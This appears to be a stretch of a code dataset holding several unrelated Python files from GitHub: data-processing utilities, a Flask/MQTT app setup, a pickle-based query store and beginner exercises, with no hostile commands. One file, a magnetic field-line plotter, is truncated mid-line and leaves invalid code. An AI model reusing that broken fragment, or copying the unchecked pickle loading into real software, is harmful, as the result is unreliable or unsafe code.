page_ids)\n\n @classmethod\n def build_custom(\n cls, dataset_dir: Path, entity_streams_file: WikidatedEntityStreamsFile\n ) -> WikidatedSortedEntityStreamsFile:\n archive_path = cls._make_archive_path(dataset_dir, entity_streams_file.page_ids)\n if archive_path.exists():\n _LOGGER.debug(\n f\"Sorted entity streams file '{archive_path.name}' already exists, \"\n f\"skipping building.\"\n )\n else:\n _LOGGER.debug(f\"Building sorted entity streams file {archive_path.name}.\")\n tmp_path = archive_path.parent / (\"tmp.\" + archive_path.name)\n revisions = list(entity_streams_file.iter_revisions())\n revisions.sort(key=lambda rev: rev.revision_id)\n with SevenZipArchive(tmp_path).write() as fd:\n for revision in revisions:\n fd.write(revision.json() + \"\\n\")\n tmp_path.rename(archive_path)\n _LOGGER.debug(\n f\"Done building sorted entity streams file {archive_path.name}.\"\n )\n\n return WikidatedSortedEntityStreamsFile(\n archive_path, entity_streams_file.page_ids\n )\n\n\n_T_WikidatedSortedEntityStreamsFile_co = TypeVar(\n \"_T_WikidatedSortedEntityStreamsFile_co\",\n bound=WikidatedSortedEntityStreamsFile,\n covariant=True,\n)\n\n\nclass WikidatedGenericSortedEntityStreams(\n Generic[_T_WikidatedSortedEntityStreamsFile_co]\n):\n def __init__(\n self, files_by_page_ids: RangeMap[_T_WikidatedSortedEntityStreamsFile_co]\n ):\n self._files_by_page_ids = files_by_page_ids\n\n def __len__(self) -> int:\n return len(self._files_by_page_ids)\n\n def __iter__(self) -> Iterator[_T_WikidatedSortedEntityStreamsFile_co]:\n return iter(self._files_by_page_ids.values())\n\n @overload\n def __getitem__(self, key: int) -> _T_WikidatedSortedEntityStreamsFile_co:\n ...\n\n @overload\n def __getitem__(\n self, key: slice\n ) -> Iterable[_T_WikidatedSortedEntityStreamsFile_co]:\n ...\n\n @overload\n def __getitem__(self, key: object) -> Any: # NoReturn doesn't work here.\n ...\n\n def __getitem__(\n self, key: object\n ) -> Union[\n WikidatedSortedEntityStreamsFile,\n Iterable[_T_WikidatedSortedEntityStreamsFile_co],\n ]:\n if isinstance(key, int) or isinstance(key, slice):\n return self._files_by_page_ids[key]\n else:\n raise TypeError(\"key needs to be of type int or slice.\")\n\n @classmethod\n def load_custom(cls, dataset_dir: Path) -> WikidatedSortedEntityStreams:\n _LOGGER.debug(f\"Loading sorted entity streams for dataset {dataset_dir.name}.\")\n files_by_page_ids = RangeMap[WikidatedSortedEntityStreamsFile]()\n for 
path in dataset_dir.glob(\n WikidatedSortedEntityStreamsFile.archive_path_glob(dataset_dir)\n ):\n file = WikidatedSortedEntityStreamsFile.load_custom(path)\n files_by_page_ids[file.page_ids] = file\n _LOGGER.debug(\n f\"Done loading sorted entity streams for dataset {dataset_dir.name}.\"\n )\n return WikidatedSortedEntityStreams(files_by_page_ids)\n\n @classmethod\n def build_custom(\n cls, dataset_dir: Path, entity_streams: WikidatedEntityStreams\n ) -> WikidatedSortedEntityStreams:\n _LOGGER.debug(f\"Building sorted entity streams for dataset {dataset_dir.name}.\")\n files_by_page_ids = RangeMap[WikidatedSortedEntityStreamsFile]()\n for entity_streams_file in tqdm(\n entity_streams, desc=\"Sorted Entity Streams\", dynamic_ncols=True\n ):\n file = WikidatedSortedEntityStreamsFile.build_custom(\n dataset_dir, entity_streams_file\n )\n files_by_page_ids[file.page_ids] = file\n _LOGGER.debug(\n f\"Done building sorted entity streams for dataset {dataset_dir.name}.\"\n )\n return WikidatedSortedEntityStreams(files_by_page_ids)\n\n\nWikidatedSortedEntityStreams = WikidatedGenericSortedEntityStreams[\n WikidatedSortedEntityStreamsFile\n]\n","repo_name":"lschmelzeisen/wikidated","sub_path":"src/wikidated/wikidated_sorted_entity_streams.py","file_name":"wikidated_sorted_entity_streams.py","file_ext":"py","file_size_in_byte":7465,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"37973593296","text":"import torch\nfrom tqdm import tqdm\nfrom multiprocessing import Pool, cpu_count\nfrom contextlib import closing\nimport os\nimport pickle\nimport re\nfrom loguru import logger\n\nfrom marc_thesis.clustering_embeddings.utils import (\n extract_vector_hidden_state,\n bert_encode_text,\n)\nfrom marc_thesis.utils.file_manager import store_file_target, load_file_target\n\n\ndef _extract_embeddings(bert_encoded_corpus, tokenized_target_word):\n embeddings_dict = {\n \"target_word_embeddings\": [],\n \"sentence_idx\": [],\n }\n\n for sentence_idx, tokenized_sentence in tqdm(\n bert_encoded_corpus, desc=\"Extracting embeddings\"\n ):\n target_word_vectors = extract_vector_hidden_state(\n tokenized_sentence, tokenized_target_word\n )\n for target_word_vector in target_word_vectors:\n embeddings_dict[\"target_word_embeddings\"].append(\n target_word_vector\n )\n embeddings_dict[\"sentence_idx\"].append(sentence_idx)\n\n return embeddings_dict\n\n\ndef extract_bert_embeddings_of_word(\n sentences_dict: dict, target_word: str\n) -> dict:\n \"\"\"Extract the word embedding of the target word in each sentence.\n\n Assumption:\n - The target word is in the sentences\n \"\"\"\n\n sentences = sentences_dict[\"sentences\"]\n indices = sentences_dict[\"sentence_idx\"]\n\n _, tokenized_target_word = bert_encode_text(\n target_word, special_tokens=False\n )\n\n bert_encoded_corpus = [\n (idx, bert_encode_text(sentence, special_tokens=True)[1])\n for sentence, idx in tqdm(\n zip(sentences, indices),\n desc=\"Encoding sentences with BERT\",\n total=len(sentences),\n )\n ]\n\n bert_encoded_corpus = [\n (idx, bert_encoded_text_item)\n for idx, bert_encoded_text_item in tqdm(\n bert_encoded_corpus,\n desc=\"Filtering long sentences\",\n total=len(bert_encoded_corpus),\n )\n if len(bert_encoded_text_item) <= 512\n ]\n\n embeddings_dict = _extract_embeddings(\n bert_encoded_corpus, tokenized_target_word\n )\n\n store_file_target(\n target_word, f\"{target_word}_embeddings.pickle\", embeddings_dict\n )\n\n return 
embeddings_dict\n","repo_name":"marc-gav/MasterThesis","sub_path":"marc_thesis/clustering_embeddings/extract_bert_embeddings.py","file_name":"extract_bert_embeddings.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3006291362","text":"# read the two input strings\nA = input()\nB = input()\n\nA = '0'+A\nB = '0'+B\n\nlenA = len(A)\nlenB = len(B)\nMAX = 0\ndp = [[0 for i in range(lenB+1)] for j in range(lenA+1)]\n\nfor i in range(1,lenA):\n    for j in range(1,lenB):\n        if(A[i] == B[j]):\n            dp[i][j] = dp[i-1][j-1]+1\n            if(dp[i][j]>MAX):\n                MAX = dp[i][j]\n        else:\n            dp[i][j] = 0\n\n#print(dp)\nprint(MAX)\n\n    \n\n","repo_name":"juhongyee/baekjoon","sub_path":"145 공통부분문자열/공통 부분 문자열.py","file_name":"공통 부분 문자열.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31850701312","text":"\"\"\"\nSummaritizer database model\n\"\"\"\n\nfrom app.utils.hash import verify\nfrom .summaritizer_schema import db\n\ndef add_post(_uuid, author, deletes_at, email, content, key):\n    _id = db.summary.insert(\n        uuid = _uuid,\n        author = author,\n        delete_at = deletes_at,\n        email = email,\n        content = content,\n        key = key\n    )\n    db.commit()\n    return _id\n\n\ndef get_post(_id, _uuid, deletes_at):\n    result = db(\n        (db.summary.id == _id) & \n        (db.summary.uuid == _uuid) &\n        (db.summary.delete_at > deletes_at)\n    ).select(db.summary.author, db.summary.content)\n    if result:\n        return { \n            'data': result.first().as_dict(),\n            'status_code': 200\n        }\n    return {\n        'data': 'no post found',\n        'status_code': 404\n    }\n\n\ndef match_key(_id, _uuid, deletes_at, key):\n    result = db(\n        (db.summary.id == _id) &\n        (db.summary.uuid == _uuid) &\n        (db.summary.delete_at > deletes_at)\n    ).select(db.summary.key)\n    if result:\n        return verify(key, result.first().as_dict().get('key'))\n    else:\n        return None\n\n\ndef remove_post(_id, _uuid, key, deletes_at):\n    key_status = match_key(_id, _uuid, deletes_at, key)\n    if key_status == None:\n        return {\n            'data': '''\\\nPost has already expired \\\nand has been deleted. \\\nThe one you are seeing is \\\na local cached version.''',\n            'status_code': 406\n        }\n    if key_status == False:\n        return {\n            'data': 'Key does not match',\n            'status_code': 403\n        }\n    db(\n        (db.summary.id == _id) & \n        (db.summary.uuid == _uuid)\n    ).delete()\n    db.commit()\n    return {\n        'data': 'Post successfully deleted',\n        'status_code': 200\n    }\n\n\ndef update_post_content(\n    _id, _uuid, author, content, key, deletes_at):\n    key_status = match_key(_id, _uuid, deletes_at, key)\n    if key_status == None:\n        return {\n            'data': '''\\\nPost has already expired \\\nand has been deleted. 
\\\nThe one you are seeing is \\\na local cached version.''',\n            'status_code': 406\n        }\n    if key_status == False:\n        return {\n            'data': 'Key does not match',\n            'status_code': 403\n        }\n    db(\n        (db.summary.id == _id) & \n        (db.summary.uuid == _uuid)\n    ).update(author = author, content = content)\n    db.commit()\n    return {\n        'data': 'Post successfully updated',\n        'status_code': 201\n    }\n","repo_name":"gourish13/summaritizer","sub_path":"app/models/summaritizer_model.py","file_name":"summaritizer_model.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4652003855","text":"# -*- coding: utf-8 -*-\n\n# app/__init__.py\n\n# third-party imports\nfrom flask import Flask, render_template, abort\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager, current_user\nfrom flask_migrate import Migrate\nfrom flask_bootstrap import Bootstrap\nfrom flask_jsglue import JSGlue\nfrom werkzeug.routing import IntegerConverter as OrigIntegerConvertor\nimport logging.handlers, os, sys\nimport flask_excel as excel\nimport random\n\napp = Flask(__name__, instance_relative_config=True)\n\n#V1.0 : python 3, simplified google api\n#V1.1 : switched to nginx\n#V1.2 : add/update switch : no ip address required\n#V1.3 : bugfix : could not edit switch\n# V2.0 : replaced Esp Easy with tasmota\n# V2.1 : added uwsgi logging\n# V2.2 : issue with lock\n# V2.3 : mqtt publish : do NOT put inside lock\n# V2.4 : list of switches : order by location\n# V2.5: update requirements.txt\n# V2.6: added 2 more timesettings\n# V2.7: log in via secret key\n# V2.8: bugfix: translate boolean-string to boolean\n# V2.9: cleanup\n# V2.10: disabled some logging in mqtt\n# V2.11: small bugfix\n# V2.12: update version number in browser\n# V2.13: first run of scheduler: force switches to schedule\n# V2.14: a switch is cached when it is in the database only\n# V2.15: update favicon\n\n@app.context_processor\ndef inject_version():\n    return dict(version = 'V2.15')\n\n#enable logging\nLOG_HANDLE = 'IB'\nlog = logging.getLogger(LOG_HANDLE)\n\n# local imports\nfrom config import app_config\n\nclass MySQLAlchemy(SQLAlchemy):\n    def apply_driver_hacks(self, app, info, options):\n        options.update({\n            'isolation_level': 'READ COMMITTED',\n        })\n        super(MySQLAlchemy, self).apply_driver_hacks(app, info, options)\n\ndb = MySQLAlchemy()\nlogin_manager = LoginManager()\n\n#The original werkzeug-url-converter cannot handle negative integers (e.g. 
asset/add/-1/1)\nclass IntegerConverter(OrigIntegerConvertor):\n regex = r'-?\\d+'\n num_convert = int\n\n\ndef create_admin(db):\n from app.models import User\n admin = User(username='admin', password='admin', is_admin=True)\n db.session.add(admin)\n db.session.commit()\n\n#support custom filtering while logging\nclass MyLogFilter(logging.Filter):\n def filter(self, record):\n record.username = current_user.username if current_user and current_user.is_active else 'NONE'\n return True\n\ndef ms2m_s_ms(value):\n if value:\n min = value/60000\n sec = int((value - min*60000)/1000)\n msec = value - min*60000 - sec*1000\n return('{}:{:02d},{}'.format(min, sec, msec))\n else:\n return None\n\nmqtt = scheduler = None\n\nconfig_name = os.getenv('FLASK_CONFIG')\nconfig_name = config_name if config_name else 'production'\n\n#set up logging\nLOG_FILENAME = os.path.join(sys.path[0], app_config[config_name].STATIC_PATH, 'log/ib-log.txt')\ntry:\n log_level = getattr(logging, app_config[config_name].LOG_LEVEL)\nexcept:\n log_level = getattr(logging, 'INFO')\nlog.setLevel(log_level)\nlog.addFilter(MyLogFilter())\nlog_handler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=10 * 1024, backupCount=5)\nlog_formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(username)s - %(message)s')\nlog_handler.setFormatter(log_formatter)\nlog.addHandler(log_handler)\n\nlog.info('start IB')\n\napp.config.from_object(app_config[config_name])\napp.config.from_pyfile('config.py')\n\napp.jinja_env.filters['milliseconds_to_minutes_seconds'] = ms2m_s_ms\n\nBootstrap(app)\n\njsglue = JSGlue(app)\ndb.app=app # hack :-(\ndb.init_app(app)\nexcel.init_excel(app)\n\napp.url_map.converters['int'] = IntegerConverter\n\nrandom.seed()\n\nlogin_manager.init_app(app)\nlogin_manager.login_message = 'Je moet aangemeld zijn om deze pagina te zien!'\nlogin_manager.login_view = 'auth.login'\n\nmigrate = Migrate(app, db)\n\nfrom .mqtt import EspEasy, Tasmota\nmqtt = Tasmota(app, log)\nmqtt.start()\nmqtt.subscribe_to_switches()\n\nfrom .scheduler import Scheduler\nscheduler = Scheduler(mqtt, app, log)\nscheduler.start()\n\n#from app import models\n\n#create_admin(db) # Only once\n\n#flask db migrate\n#flask db upgrade\n#uncheck when migrating database\n#return app\n\nfrom .auth import auth as auth_blueprint\napp.register_blueprint(auth_blueprint)\n\nfrom .user import user as user_blueprint\napp.register_blueprint(user_blueprint)\n\nfrom .overview import overview as overview_blueprint\napp.register_blueprint(overview_blueprint)\n\n@app.errorhandler(403)\ndef forbidden(error):\n return render_template('errors/403.html', title='Forbidden'), 403\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template('errors/404.html', title='Page Not Found'), 404\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return render_template('errors/500.html', title='Server Error'), 500\n\n@app.route('/500')\ndef error_500():\n abort(500)\n\n","repo_name":"manuelborowski/infoboard","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35639442568","text":"# Reject if exceeds not met\n\nimport random\nhigh_score = [10]\n\n \ndef game():\n attempts = 1\n ans = random.randint(1, 10)\n print(\"Welcome to the Number Guessing Game!\\nThe high score is {}.\\n\".format(min(high_score)))\n while True:\n try:\n guess = int(input(\"Guess a number 1-10: \"))\n if 
guess < 1 or guess > 10:\n attempts += 1\n print(\"Sorry, your guess is outside of the range, please try again: \")\n continue\n elif guess < ans:\n attempts += 1\n print(\"It's higher: \")\n continue\n elif guess > ans:\n attempts += 1\n print(\"It's lower: \")\n continue\n else:\n if attempts == 1:\n tries = \"try\"\n else:\n tries = \"tries\"\n print(\"\\nThat is correct!!! You guessed it in {} {}!\".format(attempts, tries))\n high_score.append(attempts)\n play_again = input(\"\\nWould you like to play again? Yes/No: \")\n if play_again.lower() == 'yes':\n game()\n else:\n print(\"\\nThank you for playing!\")\n break\n\n except ValueError:\n attempts += 1\n print(\"Please use integers (whole numbers)\")\n\n\ngame()","repo_name":"chinson2005/Unit-1-Project","sub_path":"Unit_1_Project.py","file_name":"Unit_1_Project.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6513260506","text":"# import pygame module\r\nimport pygame\r\n\r\n# initializing imported module\r\npygame.init()\r\n\r\n# Displaying a window of height 500 and width 400\r\npygame.display.set_mode((400, 500))\r\n\r\n# Here we set name or title of our pygame window\r\npygame.display.set_caption('IIPGH')\r\n\r\n# Here we load the image we want to use\r\nIcon = pygame.image.load('sample_logo.png')\r\n\r\n# We use set_icon to set new icon\r\npygame.display.set_icon(Icon)\r\n\r\n# Creating a bool value which checks if game is running\r\nrunning = True\r\n\r\n# Keep game running till running is true\r\nwhile running:\r\n\t\r\n\t# Check for event if user has pushed any event in queue\r\n\tfor event in pygame.event.get():\r\n\t\t\r\n\t\t# If event is of type quit then set running bool to false\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\trunning = False\r\n","repo_name":"barbara99/pygame_lessons","sub_path":"l3_name&icon_window.py","file_name":"l3_name&icon_window.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6089227732","text":"\ndef split_str(phrase: str, split_fix: int):\n phrase_split_list = []\n\n split = split_fix\n while split_fix < len(phrase):\n if len(phrase) > split and phrase[split_fix] == ' ':\n temp_phrase = phrase[:split_fix]\n phrase_split_list.append(temp_phrase)\n phrase = phrase[split_fix:]\n else:\n split = split_fix\n if len(phrase) > split_fix:\n for i in reversed(phrase[:split_fix]):\n if i == ' ':\n temp_phrase = phrase[:split]\n phrase_split_list.append(temp_phrase)\n phrase = phrase[split:]\n break\n else:\n split -= 1\n # else:\n # temp_phrase = phrase\n # phrase_split_list.append(temp_phrase)\n else:\n if phrase:\n temp_phrase = phrase\n phrase_split_list.append(temp_phrase)\n\n return phrase_split_list\n\n# text = 'Все иностранные граждане и лица без гражданства, независимо от возраста, следующие транзитом через территорию Российской Федерации должны предъявить медицинский сертификат об отрицательном результате ПЦР-теста на COVID-19, сделанном не ранее, чем за 48 часа до прибытия (сертификат предъявляется в распечатанном виде, на русском или английском языках (принимается нотариально заверенный перевод на русский язык). ' \\\n# 'Исключения: ' \\\n# 'граждане Российской Федерации. ' \\\n# 'Более подробная информация касательно правил въезда на территорию Российской Федерации изложена в Распоряжении Правительства Российской Федерации от 16.03.2020 N 635-р.; от 18.05.2021 г. 
№1291-р.'\n#\n# res = (split_str(text, 20))\n# for i in res:\n#     print(i)\n# print(res[0:-1])\n","repo_name":"RuslanSlepuhin/travel_visa_bot","sub_path":"try_cut_str_len.py","file_name":"try_cut_str_len.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24943669077","text":"from django.urls import path, re_path\n\nfrom . import views\n\nurlpatterns = [\n    #movies\n    re_path(r\"^movie\\/?$\", views.MovieAllView.as_view()),\n    path(\"movie/<int:pk>/\", views.MovieOneDetailView.as_view()),\n\n    #movie rating\n    re_path(r\"^review\\/?$\", views.CreateReviewView.as_view()),\n    re_path(r\"^rate\\/?$\", views.CreateRatingView.as_view()),\n\n    #actors\n    path(\"actors/\", views.AllActorView.as_view()),\n    path(\"actors/<int:pk>/\", views.ActorDetailView.as_view()),\n\n    #categories\n    path(\"category/\", views.ShowCategory.as_view()),\n    path(\"categories/\", views.ShowAllCategory.as_view()),\n    path(\"categories/<int:pk>/\", views.ShowOneCategoryMovies.as_view()),\n]\n","repo_name":"mrpie228/kino_rest_proj","sub_path":"kino/backend/kino_main/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40371214437","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 12 15:23:44 2022\nField map: chap18 app1\n@author: remimetzdorff\n\"\"\"\n\n# Have a look at https://quickfield.com/glossary/magnetic_field_mapping.htm\n# and search for vector potential \n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom scipy.integrate import odeint\n\n# mu0 * I / 2 / np.pi / r0 = 1 # with I = 1A\n\ndef mysavefig(filename):\n    plt.tight_layout()\n    plt.savefig(\"../images/chap18/\"+filename, bbox_inches=\"tight\", dpi=600)\n    return\n\ndef champB_fil(x,y,x0,y0, r0=.05, I=1):\n    r = np.sqrt((x-x0)**2 + (y-y0)**2)\n    if r width/2:\n            break\n        elif np.abs(lineBy[-1]) > width/2:\n            break\n        elif dsquared < step**2:\n            break\nax3.plot(lineBx, lineBy)\n\"\"\"\n\ndef plotter(ax):\n    for sens in [-1,1]:\n        def f(V,t):\n            x, y = V\n            Bx, By = champB(x, y, fils)\n            B = np.sqrt(Bx**2 + By**2)\n            dx = sens*Bx/B\n            dy = sens*By/B\n            return [dx, dy]\n        \n        M0s = [[k*width/50 - width/2,0] for k in range(51)]\n        M0s = [[0,.6], [0,.7], [0,.9], [0, 1.5]]\n        M0s += [[-1,-.6], [-1, -.7], [-1, -.9], [-1, -1.5]]\n        M0s += [[1,-.6], [1, -.7], [1, -.9], [1, -1.5]]\n        M0s += [[-.5,-.25], [1,-.05], [.4,.4], [1.25, .5], [1.5,.75],\n                [.05,-1.25], [-2.5,-1], [-3.7,-1.7], [-1,3.6]]\n        \n        for M0 in M0s:\n            t = np.linspace(0,15,1000)\n            V = odeint(f, M0, t, rtol=1e-6,atol=1e-6)\n            lineBx, lineBy = V[:,0], V[:,1]\n            ax.plot(lineBx, lineBy, \"C0\", lw=1)\n    return\n#ax3.streamplot(x, y, Bx, By, color=\"C0\", linewidth=1, cmap=plt.cm.inferno,density=2, arrowstyle='->', arrowsize=1.5)\nplotter(ax2)\n\nfor ax in [ax1, ax2]:\n    ax.set_aspect(\"equal\")\n    ax.set_xlim(-width/2,width/2)\n    ax.set_ylim(-width/2,width/2)\n    ax.axis(\"off\")\n\nfig, ax = plt.subplots(1, figsize=(6,4))\nplotter(ax)\nax.set_aspect(\"equal\")\nax.set_xlim(-4,4)\nax.set_ylim(-2.75,2.75)\nplt.axis(\"off\")\n\n#mysavefig(\"true_field_line.pdf\")\n\n\n\n\n\n\n\n\n\n","repo_name":"remimetzdorff/mp2i","sub_path":"python/chap18-app1.py","file_name":"chap18-app1.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"72266192147","text":"import 
string\n\nbook= open (\"book.txt\")\nbook1= book.read()\nbook2= book1.replace(\"-\",\" \")\nnew_book= book2.split()\nnew_book_list= []\nfor word in new_book:\n    word1= word.strip(string.punctuation+string.whitespace)\n    word2= word1.lower()\n    new_book_list.append(word2)\nprint(new_book_list)\n\nword_list= open(\"words.txt\")\nnew_word_list=[]\nfor char in word_list:\n    char= char.strip()\n    new_word_list.append(char)\nprint(new_word_list)\n\ndef subtraction(l1, l2):\n    temp=[]\n    for item in l1:\n        if item not in l2:\n            temp.append(item)\n    print(temp)\n    print(len(temp))\n\nsubtraction(new_book_list, new_word_list )\n","repo_name":"sowmya1a/inwk6312summer2020-Lab4","sub_path":"homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71524465746","text":"mixed = [1,2,3,4,5,'rehan','shazia','nazia']\r\nmixed.append('tiger')\r\nprint(mixed)\r\n\r\nfruits=[]\r\nfruits.append('mango')\r\nfruits.append('grapes')\r\nprint(fruits)\r\n\r\n\r\n# to add element to a particular position #INSERT METHOD\r\nfruits=['mango','grapes','guava','litchi']\r\nanimals=['tiger','lion','man','monkey']\r\nfruits.insert(1,'orange')\r\nprint(fruits)\r\nsummation= fruits+animals\r\nprint(summation)\r\n\r\n# EXTEND METHOD\r\nanimals.extend(fruits)\r\nanimals.append(fruits)\r\nprint(animals)\r\nfruits.append(animals)\r\nfruits.extend(animals)\r\nprint(fruits)\r\n","repo_name":"rehanjamil10/python..py","sub_path":"append.py","file_name":"append.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41132514095","text":"#!/usr/bin/python3\n\"\"\" This Module implements a Base Image Query object \"\"\"\nimport uuid\nimport os\nimport pickle\n#from models.api_users import Users\n\n\nclass ImageQuery():\n    \"\"\" A representation of an image query object \"\"\"\n    \n    def __init__(self, image_file, username, classification_results):\n        self.image_file = image_file \n        self.classification = classification_results\n        self.username = username\n    \n    \n    \n    def save_to_pickle(self, user_key):\n        \"\"\" generate unique directory for user_key\n        Args:\n            user_key (str): The User provided Api-Key\n        \"\"\"\n        \n        try:\n            \n            project_base_directory = os.getcwd()\n            storage_directory = os.path.join(project_base_directory, 'pickle_file_storage')\n            print(storage_directory)\n            os.makedirs(storage_directory, exist_ok=True)\n            user_directory = os.path.join(storage_directory, user_key)\n            os.makedirs(user_directory, exist_ok=True)\n            \n            filename = str(uuid.uuid4())\n            file_path = os.path.join(user_directory, filename + '.pickle')\n            \n            # Pickle the ImageQuery object\n            with open (file_path, 'wb') as pickle_file:\n                pickle.dump(self, pickle_file)\n            \n            print(\"Object Successfully Pickled!\")\n            return pickle_file\n        \n        except pickle.PicklingError as PE:\n            print(\"Error in Creating Pickle!: {}\".format(PE))\n            return False\n        \n        except (IOError, FileNotFoundError) as IOErrors:\n            print(\"Error occurred when working on file: {}\".format(IOErrors))\n            return False\n        \n        except Exception as E:\n            print(\" An Error Occurred: {}\".format(E))\n            return False\n    \n    \n    \n    def load_from_pickle(self, pickle_file):\n        \"\"\" This function deserializes a pickle file\n        into the original ImageQuery object\n\n        Args:\n            pickle_file(file): The pickled file to deserialize\n        \n        
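Example (illustrative sketch only; the key, file name and classification dict below are hypothetical, not part of the original module):\n            query = ImageQuery('cat.png', 'alice', {'label': 'cat'})\n            restored = query.load_from_pickle('pickle_file_storage/some_key/some_uuid.pickle')\n\n        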
Returns:\n            class: The instance of the pickled class.\n        \"\"\"\n        \n        try:\n            with open(pickle_file, 'rb') as file:\n                serial_query_obj = pickle.load(file)\n            \n            # Verify the object was successfully created\n            print('This object: {} was successfully un-pickled'.format(serial_query_obj.__dict__))\n            return serial_query_obj\n        \n        except pickle.PickleError as PE:\n            print(\"Error occurred during unpickling: {}\".format(PE))\n            return None\n\n        except (IOError, FileNotFoundError) as IOErrors:\n            print(\"Error occurred while opening or reading the file: {}\".format(IOErrors))\n            return None\n\n        except AttributeError as Attr_Error:\n            print(\"Error occurred during unpickling. Attribute not found: {}\".format(Attr_Error))\n            return None\n\n        except Exception as E:\n            print(\"An error occurred:\", str(E))\n            return None\n    \n    def delete_pickle_file(self):\n        # call the pickle_file delete method\n        # also handle any database in any\n        pass","repo_name":"AtangfMokamogo/NullExplicit_API","sub_path":"models/image_query.py","file_name":"image_query.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32277606999","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 2 08:58:41 2022\n\n@author: bensonb\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import r2_score, balanced_accuracy_score\n\n\ndef gini(x, weights=None):\n    '''\n    Index that measures sparsity across a set of values, x.\n    If values in x are roughly constant, then this index is near 0.\n    If values in x have a large spread, then this index is near 1.\n\n    Implementation copied from \n    https://stackoverflow.com/questions/48999542/more-efficient-weighted-gini-coefficient-in-python\n\n    Parameters\n    ----------\n    x : 1-d array of values\n        .\n    weights : 1-d array, floats\n        weightings corresponding to values of x. The default is None.\n\n    Returns\n    -------\n    float\n\n    '''\n    if weights is None:\n        weights = np.ones_like(x)\n    # Calculate mean absolute deviation in two steps, for weights.\n    count = np.multiply.outer(weights, weights)\n    mad = np.abs(np.subtract.outer(x, x) * count).sum() / count.sum()\n    rmad = mad / np.average(x, weights=weights)\n    # Gini equals half the relative mean absolute deviation.\n    return 0.5 * rmad\n\n\ndef fix_pd_regions(res):\n    '''\n    Takes a pandas dataframe and fixes the 'region' column.\n    Regions are often lists with single values which makes dataframe\n    manipulation difficult. This function fixes that by removing \n    the list and using the single value\n\n    Regions which are not of type list are not changed\n\n    A region list with multiple elements causes an assertion error\n\n    Parameters\n    ----------\n    res : pandas dataframe\n        must have a column called 'region'\n    Returns\n    -------\n    pandas dataframe\n\n    '''\n\n    print('fixing pd regions')\n    res = res.reset_index()\n    l = len(res.loc[:,'region'])\n    for i, r in enumerate(res.loc[:,'region']):\n        if i%2000==0:\n            print(f'fixed {i/l:.4f} of table')\n        if type(r) is list:\n            assert len(r) == 1\n            res.loc[i,'region'] = r[0]\n    return res\n\n\ndef get_val_from_realsession(reseidreg, value_name, RUN_ID=1):\n    '''\n    helper function meant to take a pandas dataframe, reseidreg, of decoding results from\n    a single eid and a single region. The value corresponding to the value_name column,\n    RUN_ID number, and pseudo_id=-1 is returned. There should only be one such value, so \n    if the dataframe contains multiple, then None is returned. 
If the value is None, then\n    None is returned. \n\n    Parameters\n    ----------\n    reseidreg : pandas dataframe\n        Decoding results from a single eid and single region. \n        .\n    value_name : str\n        the name of a column in reseidreg\n        .\n    RUN_ID=1 : int\n        The run id of the desired decoding value. Decoding is often repeated multiple \n        times to reduce variability, and run id indexes these repetitions. Default is 1.\n\n    Returns\n    -------\n    numpy array with a single value\n\n    '''\n\n    my_vals = list(reseidreg.loc[(reseidreg['pseudo_id']==-1)&(reseidreg['run_id']==RUN_ID), value_name])\n    if (len(my_vals) != 1) or (my_vals[0] is None):\n        return None\n    return np.array(my_vals[0])\n\n\ndef check_scores(my_preds, my_targets, score_name, real_scores):\n    '''\n    checks whether the predictions produce the same performance \n    scores as those that are given in the real_scores array. \n    Compares predictions (my_preds) and targets (my_targets) to produce the\n    desired score_name and returns True if calculated scores all match the\n    recorded scores\n\n    Parameters\n    ----------\n    my_preds : list of 2-d arrays\n        2-d arrays are decoder predictions across trials. Assumed that \n        second dimension has size 1 i.e. not wheel decoding. The list indexes\n        across run ids\n    my_targets : 2-d array\n        Same format as my_preds, but not a list (targets are the same for all run ids).\n    score_name : str, 'balanced_acc_test' or 'R2_test'\n        These are the two test statistics used to quantify BWM decoding performance: \n        balanced_accuracy_score and r2_score from sklearn.metrics. \n    real_scores : 1-d array\n        The recorded scores of decoding performance across run id.\n\n    Returns\n    -------\n    